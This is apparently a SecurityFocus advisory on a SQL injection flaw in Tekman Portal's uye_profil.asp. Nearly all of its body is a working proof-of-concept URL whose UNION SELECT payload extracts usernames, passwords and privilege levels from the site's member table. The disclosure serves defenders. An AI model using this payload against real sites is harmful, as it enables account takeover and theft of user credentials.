Tekman Portal Uye_Profil.ASP SQL Injection Vulnerability

An attacker can exploit this vulnerability using a web client.

The following proofs-of-concept is available:

http://www.example.com/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2


 

Privacy Statement
Copyright 2010, SecurityFocus